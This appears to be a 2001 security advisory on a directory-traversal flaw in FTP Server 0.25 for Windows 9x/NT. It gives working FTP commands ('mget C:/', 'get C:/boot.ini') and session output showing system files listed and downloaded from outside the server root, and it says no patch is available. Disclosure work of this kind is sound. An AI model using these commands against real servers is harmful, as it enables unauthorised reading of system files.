Andrisk Security Advisory 1# - FTP server v0.25 Topic: FTP Server v.025 Announced: 2001-04-25 Affects: FTP server version 0.25 OS : Win9x/NT I. Problem Description ********************** FTP Server 0.25 is an FTP server for Windows 9x/NT. A bug allows any user download and view any files from remote computer. II. Impact ************** When sending the command "mget C:/" then it is possible to view files from C:\ When sending the command "get C:/file [filename]" then it is possible to download current file Example 1: -------- ftp> mget (remote-files) C:/ mget !!? 200 Port command successful. 150 Opening data connection for !!. 501 Cannot RETR. Cannot open file C:\FTP Server\ftproot\!! mget AUTOEXEC.BAT? 200 Port command successful. 150 Opening data connection for AUTOEXEC.BAT. 501 Cannot RETR. Cannot open file C:\FTP Server\ftproot\AUTOEXEC.BAT mget boot.ini? 200 Port command successful. 150 Opening data connection for boot.ini. 501 Cannot RETR. Cannot open file C:\FTP Server\ftproot\boot.ini mget CONFIG.SYS? 200 Port command successful. 150 Opening data connection for CONFIG.SYS. 501 Cannot RETR. Cannot open file C:\FTP Server\ftproot\CONFIG.SYS mget ffastun.ffa? 200 Port command successful. 150 Opening data connection for ffastun.ffa. 501 Cannot RETR. Cannot open file C:\FTP Server\ftproot\ffastun.ffa mget ffastun.ffl? 200 Port command successful. 150 Opening data connection for ffastun.ffl. 501 Cannot RETR. Cannot open file C:\FTP Server\ftproot\ffastun.ffl mget ffastun.ffo? 200 Port command successful. 150 Opening data connection for ffastun.ffo. 501 Cannot RETR. Cannot open file C:\FTP Server\ftproot\ffastun.ffo mget ffastun0.ffx? 200 Port command successful. 150 Opening data connection for ffastun0.ffx. 501 Cannot RETR. Cannot open file C:\FTP Server\ftproot\ffastun0.ffx mget FTP Server? 200 Port command successful. 150 Opening data connection for FTP Server. 501 Cannot RETR. Cannot open file C:\FTP Server\ftproot\FTP Server mget IO.SYS? 200 Port command successful. 150 Opening data connection for IO.SYS. 501 Cannot RETR. Cannot open file C:\FTP Server\ftproot\IO.SYS mget mirc? 200 Port command successful. 150 Opening data connection for mirc. 501 Cannot RETR. Cannot open file C:\FTP Server\ftproot\mirc mget MSDOS.SYS? 200 Port command successful. 150 Opening data connection for MSDOS.SYS. 501 Cannot RETR. Cannot open file C:\FTP Server\ftproot\MSDOS.SYS mget NTDETECT.COM? 200 Port command successful. 150 Opening data connection for NTDETECT.COM. 501 Cannot RETR. Cannot open file C:\FTP Server\ftproot\NTDETECT.COM mget ntldr? 200 Port command successful. 150 Opening data connection for ntldr. 501 Cannot RETR. Cannot open file C:\FTP Server\ftproot\ntldr mget os240905.bin? 200 Port command successful. 150 Opening data connection for os240905.bin. 501 Cannot RETR. Cannot open file C:\FTP Server\ftproot\os240905.bin mget os560179.bin? 200 Port command successful. 150 Opening data connection for os560179.bin. 501 Cannot RETR. Cannot open file C:\FTP Server\ftproot\os560179.bin mget pagefile.sys? 200 Port command successful. 150 Opening data connection for pagefile.sys. 501 Cannot RETR. Cannot open file C:\FTP Server\ftproot\pagefile.sys mget Program Files? 200 Port command successful. 150 Opening data connection for Program Files. 501 Cannot RETR. Cannot open file C:\FTP Server\ftproot\Program Files mget rc5? 200 Port command successful. 150 Opening data connection for rc5. 501 Cannot RETR. Cannot open file C:\FTP Server\ftproot\rc5 mget RECYCLER? 200 Port command successful. 150 Opening data connection for RECYCLER. 501 Cannot RETR. Cannot open file C:\FTP Server\ftproot\RECYCLER mget TEMP? 200 Port command successful. 150 Opening data connection for TEMP. 501 Cannot RETR. Cannot open file C:\FTP Server\ftproot\TEMP mget WINNT? 200 Port command successful. 150 Opening data connection for WINNT. 501 Cannot RETR. Cannot open file C:\FTP Server\ftproot\WINNT ************************************************************************************************** Example 2: ftp> get (remote-file) C:/boot.ini (local-file) boot.ini local: boot.ini remote: C:/boot.ini 200 Port command successful. 150 Opening data connection for C:/boot.ini. 100% |*********************************************************************************| 289 00:00 ETA 226 File sent ok 289 bytes received in 0.00 seconds (84.00 KB/s) ftp> III. Solution ************* At this time, no patch is available yet. IV. Credits *********** Bug discovered by Andris K Greets: Mareks M, Dreef (www.lam.yo.lv), coolynx, ParaTr00p